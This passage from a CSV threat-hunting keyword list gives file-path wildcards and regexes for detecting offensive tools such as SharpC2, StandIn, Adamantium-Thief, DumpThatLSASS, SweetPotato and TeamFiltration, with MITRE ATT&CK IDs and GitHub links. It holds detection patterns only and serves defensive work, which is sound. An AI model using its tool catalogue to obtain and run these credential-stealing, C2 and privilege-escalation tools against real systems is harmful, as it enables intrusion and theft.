TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*\Src\Recon-AD-Groups\*",".{0,1000}\\Src\\Recon\-AD\-Groups\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Src\Recon-AD-Users\*",".{0,1000}\\Src\\Recon\-AD\-Users\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\stager.ps1*",".{0,1000}\\stager\.ps1.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*\StandIn --*",".{0,1000}\\StandIn\s\-\-.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\StandIn.exe*",".{0,1000}\\StandIn\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - 
TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\StandIn.pdb*",".{0,1000}\\StandIn\.pdb.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\StandIn\hStandIn.cs*",".{0,1000}\\StandIn\\hStandIn\.cs.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\StandIn\Program.cs*",".{0,1000}\\StandIn\\Program\.cs.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\StandIn_Net35.exe*",".{0,1000}\\StandIn_Net35\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\StandIn_Net45.exe *",".{0,1000}\\StandIn_Net45\.exe\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - 
TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\StandIn-1.3.zip*",".{0,1000}\\StandIn\-1\.3\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\stardust.x64.bin*",".{0,1000}\\stardust\.x64\.bin.{0,1000}","offensive_tool_keyword","Stardust","A modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*\stardust.x64.exe*",".{0,1000}\\stardust\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","A modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*\Stardust\scripts\loader.x64.exe*",".{0,1000}\\Stardust\\scripts\\loader\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","A modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*\start_campaign.py*",".{0,1000}\\start_campaign\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*\StayKit.cna*",".{0,1000}\\StayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*\Stealer.exe*",".{0,1000}\\Stealer\.exe.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*\Stealer.sln*",".{0,1000}\\Stealer\.sln.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - 
T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*\Stealer\modules\Passwords.cs*",".{0,1000}\\Stealer\\modules\\Passwords\.cs.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*\Stealer\Stealer\modules\*",".{0,1000}\\Stealer\\Stealer\\modules\\.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*\StealTokenClient.exe*",".{0,1000}\\StealTokenClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\StealTokenDrv.cpp*",".{0,1000}\\StealTokenDrv\.cpp.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" 
"*\StealTokenDrv.exe*",".{0,1000}\\StealTokenDrv\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\stickykey.ps1*",".{0,1000}\\stickykey\.ps1.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*\Stickykeys.sh*",".{0,1000}\\Stickykeys\.sh.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\StickyNotesExtract.exe*",".{0,1000}\\StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\StolenPasswords.txt*",".{0,1000}\\StolenPasswords\.txt.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\Stompy.ps1*",".{0,1000}\\Stompy\.ps1.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*\StomPY.py*",".{0,1000}\\StomPY\.py.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*\Stompy-main\*",".{0,1000}\\Stompy\-main\\.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" 
"*\StopProcessCommand.cs",".{0,1000}\\StopProcessCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Stowaway\admin\*",".{0,1000}\\Stowaway\\admin\\.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*\Stowaway\agent\*",".{0,1000}\\Stowaway\\agent\\.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*\Stowaway\ansicon\*",".{0,1000}\\Stowaway\\ansicon\\.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*\Suborner.sln*",".{0,1000}\\Suborner\.sln.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only 
know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","0","N/A","N/A","5","463","60","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" "*\Supernova.exe*",".{0,1000}\\Supernova\.exe.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*\Supershell.tar.gz*",".{0,1000}\\Supershell\.tar\.gz.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*\Supershell\rssh\pkg\*",".{0,1000}\\Supershell\\rssh\\pkg\\.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*\Supershell\rssh\pkg\*",".{0,1000}\\Supershell\\rssh\\pkg\\.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*\SweetPotato.exe*",".{0,1000}\\SweetPotato\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Sweetpotato.exe*",".{0,1000}\\Sweetpotato\.exe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*\SweetPotato\Program.cs*",".{0,1000}\\SweetPotato\\Program\.cs.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*\SweetPotato-master.zip*",".{0,1000}\\SweetPotato\-master\.zip.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM 
privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*\swodniW\:C*",".{0,1000}\\swodniW\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\sysDb-dmp*",".{0,1000}\\sysDb\-dmp.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*\systemic.txt",".{0,1000}\\systemic\.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","177","30","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" "*\SysWhispersU.exe*",".{0,1000}\\SysWhispersU\.exe.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*\TakeMyRDP*",".{0,1000}\\TakeMyRDP.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*\Tasks\bypass-clm*",".{0,1000}\\Tasks\\bypass\-clm.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*\Tasks\lsass.dmp*",".{0,1000}\\Tasks\\lsass\.dmp.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\TASKSHELL.EXE*",".{0,1000}\\TASKSHELL\.EXE.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","57","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" "*\Tater.ps1*",".{0,1000}\\Tater\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\TChopper\chopper.*",".{0,1000}\\TChopper\\chopper\..{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*\Tchopper-main.zip*",".{0,1000}\\Tchopper\-main\.zip.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging 
unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*\TCPMITM.py*",".{0,1000}\\TCPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\TeamFiltration.dll*",".{0,1000}\\TeamFiltration\.dll.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\TeamFiltration.exe*",".{0,1000}\\TeamFiltration\.exe.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\TeamFiltration\OneDriveAPI*",".{0,1000}\\TeamFiltration\\OneDriveAPI.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - 
TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\TeamFiltration\TeamFiltration\*",".{0,1000}\\TeamFiltration\\TeamFiltration\\.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\TeamFiltrationConfig_Example.json*",".{0,1000}\\TeamFiltrationConfig_Example\.json.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\teams_dump.py*",".{0,1000}\\teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential 